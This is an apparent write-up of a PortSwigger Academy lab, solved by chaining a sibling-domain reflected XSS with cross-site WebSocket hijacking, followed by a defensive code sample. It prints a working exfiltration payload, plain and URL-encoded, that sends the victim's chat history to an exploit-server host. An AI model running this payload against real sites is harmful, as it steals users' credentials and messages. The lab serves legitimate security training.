LAB 9 - SameSite Strict bypass via sibling domain
Initial instructions
This lab's live chat feature is vulnerable to cross-site WebSocket hijacking (CSWSH). To solve the lab, log in to the victim's account.
To do this, use the provided exploit server to perform a CSWSH attack that exfiltrates the victim's chat history to the default Burp Collaborator server. The chat history contains the login credentials in plain text.
To solve this lab, first of all I intercept the GET /chat request. After forwarding the request I realized there is a WebSocket, so it may be vulnerable to CSWSH.

To confirm that, I went to the exploit server and used the following payload.
<script>
  let newWebSocket = new WebSocket("wss://0ab3003503e7388f80804e3200dd0015.web-security-academy.net/chat");
  newWebSocket.onopen = function (evt) {
    newWebSocket.send("READY");
  };
  newWebSocket.onmessage = function (evt) {
    var message = evt.data;
    fetch(
      "https://exploit-0a5c00550326381680bc4d63011f00b9.exploit-server.net/exploit?msg=" + btoa(message)
    );
  };
</script>

I deliver it to the victim and, when I check the exploit server's access log, I get the following request.

Let's decode it; I used Burp Decoder for that (it's Base64).

After a while we can see in our HTTP history a request to /resources/js/chat.js.
Here we can see that the Access-Control-Allow-Origin (ACAO) header names a subdomain; this is a sibling domain of the lab, i.e. same site, so a SameSite=Strict cookie is still sent from it.

On this new subdomain there is a login form. In the username field I tried a basic XSS payload to see whether it gets reflected, and it did.

What we can do is URL-encode this payload:
<script>
  let newWebSocket = new WebSocket("wss://0ab3003503e7388f80804e3200dd0015.web-security-academy.net/chat");
  newWebSocket.onopen = function (evt) {
    newWebSocket.send("READY");
  };
  newWebSocket.onmessage = function (evt) {
    var message = evt.data;
    fetch(
      "https://exploit-0a5c00550326381680bc4d63011f00b9.exploit-server.net/exploit?msg=" + btoa(message)
    );
  };
</script>
and send it in the vulnerable parameter, in this case username.
This is my payload, URL-encoded:
%3c%73%63%72%69%70%74%3e%0a%6c%65%74%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%20%3d%20%6e%65%77%20%57%65%62%53%6f%63%6b%65%74%28%22%77%73%73%3a%2f%2f%30%61%63%66%30%30%36%30%30%34%31%65%63%31%36%30%38%30%30%64%30%33%36%36%30%30%63%36%30%30%36%63%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%63%68%61%74%22%29%3b%0a%0a%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%6f%6e%6f%70%65%6e%20%3d%20%66%75%6e%63%74%69%6f%6e%20%28%65%76%74%29%20%7b%0a%20%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%73%65%6e%64%28%22%52%45%41%44%59%22%29%3b%0a%7d%3b%0a%0a%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%6f%6e%6d%65%73%73%61%67%65%20%3d%20%66%75%6e%63%74%69%6f%6e%20%28%65%76%74%29%20%7b%0a%20%20%76%61%72%20%6d%65%73%73%61%67%65%20%3d%20%65%76%74%2e%64%61%74%61%3b%0a%20%20%66%65%74%63%68%28%0a%20%20%20%20%22%68%74%74%70%73%3a%2f%2f%65%78%70%6c%6f%69%74%2d%30%61%61%34%30%30%32%30%30%34%33%30%63%31%66%38%38%30%66%39%30%32%39%31%30%31%63%33%30%30%64%31%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%65%78%70%6c%6f%69%74%3f%6d%73%67%3d%22%20%2b%20%62%74%6f%61%28%6d%65%73%73%61%67%65%29%0a%20%20%29%3b%0a%7d%3b%0a%3c%2f%73%63%72%69%70%74%3e

Now I generate a CSRF PoC from this request and send it to the victim.

Here I deliver it to the victim.

If I go to the log, we can see the following requests; let's decode them.

Once decoded, here we have Carlos's password.

Let's use the credentials to solve the lab.
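As an added example (not part of the lab or of PortSwigger's code), the following JavaScript shows the two server-side fixes that would break the chain used above: an exact Origin check on the WebSocket handshake, which stops CSWSH even though a SameSite=Strict cookie is still sent from a sibling subdomain, and HTML-encoding of the reflected username, which closes the XSS on the sibling domain's login page. All hostnames (app.example.com, cms.example.com, attacker.example) and the `ws`-style `verifyClient` placement are assumptions for illustration.

```javascript
// Added example, not part of the lab or of PortSwigger's code. Hostnames are hypothetical.
//  1. Validate the Origin header on every WebSocket handshake. A SameSite=Strict
//     cookie proves nothing here: the browser sends it from a sibling subdomain
//     because that is the same site, so the server must check Origin itself.
//  2. HTML-encode user input before reflecting it, so the login page on the
//     sibling domain can no longer be used to run script in a same-site context.

// Exact allow-list of origins that may open a WebSocket to the chat endpoint.
const ALLOWED_ORIGINS = new Set(['https://app.example.com']);

// True only when the Origin header parses and matches an allow-listed origin
// exactly (scheme, host and port). A missing header, "null", sibling subdomains
// and scheme or port variants all fail.
function isAllowedOrigin(originHeader, allowed = ALLOWED_ORIGINS) {
  if (typeof originHeader !== 'string' || originHeader === 'null') return false;
  let url;
  try {
    url = new URL(originHeader);
  } catch {
    return false;
  }
  // URL#origin normalises case and default ports, e.g. "HTTPS://App.Example.com:443/"
  // becomes "https://app.example.com", so the comparison is robust but still exact.
  return allowed.has(url.origin);
}

// Handshake decision for a WebSocket upgrade request. With the `ws` package this
// logic would sit in the `verifyClient` callback; it is a pure function here so it
// can be exercised without a network. `headers` is a plain object keyed by
// lower-cased header name, as Node's http module provides them.
function handshakeDecision(headers) {
  const origin = headers.origin;
  if (!isAllowedOrigin(origin)) {
    const shown = origin === undefined ? '<missing>' : origin;
    return { status: 403, reason: `origin ${shown} rejected` };
  }
  return { status: 101, reason: 'switching protocols' };
}

// Minimal HTML entity encoding for text placed into an element body or a
// double-quoted attribute. "<script>" becomes "&lt;script&gt;", so the browser
// never parses the reflected value as markup.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Render the login page's "username" reflection safely.
function renderLoginError(username) {
  return `<p>Invalid username: ${escapeHtml(username)}</p>`;
}

// Constructed handshakes mirroring the roles in the write-up (no real hosts).
const SAMPLE_HANDSHAKES = {
  legitimate: { origin: 'https://app.example.com' },  // the real chat page
  sibling:    { origin: 'https://cms.example.com' },  // same site: Strict cookie still sent
  crossSite:  { origin: 'https://attacker.example' }, // exploit-server style origin
  downgraded: { origin: 'http://app.example.com' },   // same host, wrong scheme
  nonBrowser: {},                                     // Origin header absent
};

// Evaluate every sample; returns a map of name -> HTTP status for inspection.
function evaluateSamples(samples = SAMPLE_HANDSHAKES) {
  const result = {};
  for (const [name, headers] of Object.entries(samples)) {
    result[name] = handshakeDecision(headers).status;
  }
  return result;
}

console.log(evaluateSamples());
console.log(renderLoginError('<script>alert(1)</script>'));
```

Only the legitimate origin receives a 101; the sibling subdomain, the cross-site page, the scheme downgrade and the header-less client all get a 403 before any chat history is sent. Note that the Origin check is the real control: a SameSite cookie attribute, Strict or otherwise, cannot distinguish a sibling subdomain from the application's own origin.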
